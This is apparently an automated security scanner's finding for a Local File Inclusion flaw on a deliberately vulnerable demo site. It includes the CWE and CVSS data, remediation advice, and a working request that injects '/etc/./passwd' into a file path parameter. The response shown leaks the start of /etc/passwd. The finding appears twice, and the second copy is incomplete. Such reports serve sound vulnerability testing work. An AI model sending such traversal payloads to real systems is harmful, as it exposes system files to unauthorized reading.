Local File Inclusion
Severity: High Discovered: 10 of October-2022, 11:12 PM
CWE ID
CWE-22
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Details
Local File Inclusion (also known as LFI) is the process of including files that are already located on the server by exploiting vulnerable inclusion procedures implemented in the application.
LFI occurred while injecting token "/etc/./passwd" into parameter "" in the URL.
Original URL: https://brokencrystals.com/api/file?path=config/products/crystals/amethyst.jpg&type=image/jpg
Modified URL: https://brokencrystals.com/api/filepath=%2Fetc%2F.%2Fpasswd&type=image%2Fjpg
Detected system is: Linux
Possible exposure
Data leakage, Access to unauthorized information
Remediation suggestions
The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain a white list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path.
Request
GET https://brokencrystals.com/api/file?path=%2Fetc%2F.%2Fpasswd&type=image%2Fjpg HTTP/1.1
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Cookie: bc-calls-counter=1665443548473; connect.sid=sHyC6Ic9qPYT5MQmsUZnv3nOZL1OQaY6.l7wv3qq%2BYzKke0kaiNh473SOFW%2BDgJOpYs9CB%2BmEywo
Accept-Encoding: identity
Response
HTTP/1.1 200
Server: nginx/1.19.8
Date: Mon, 10 Oct 2022 23:12:28 GMT
Content-Type: image/jpg
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1665443548511
Content-Length: 100
Cache-Control: public, max-age=99999
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/
External links
Local File Inclusion
Severity:
HighDiscovered:10 of October-2022, 11:12 PMCWE ID
CWE-22
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Details
Local File Inclusion (also known as LFI) is the process of including files that are already located on the server by exploiting vulnerable inclusion procedures implemented in the application.
LFI occurred while injecting token "/etc/./passwd" into parameter "" in the URL.
Original URL: https://brokencrystals.com/api/file?path=config/products/crystals/amethyst.jpg&type=image/jpg
Modified URL: https://brokencrystals.com/api/filepath=%2Fetc%2F.%2Fpasswd&type=image%2Fjpg
Detected system is: Linux
Possible exposure
Data leakage, Access to unauthorized information
Remediation suggestions
The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain a white list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path.
Request
Response
External links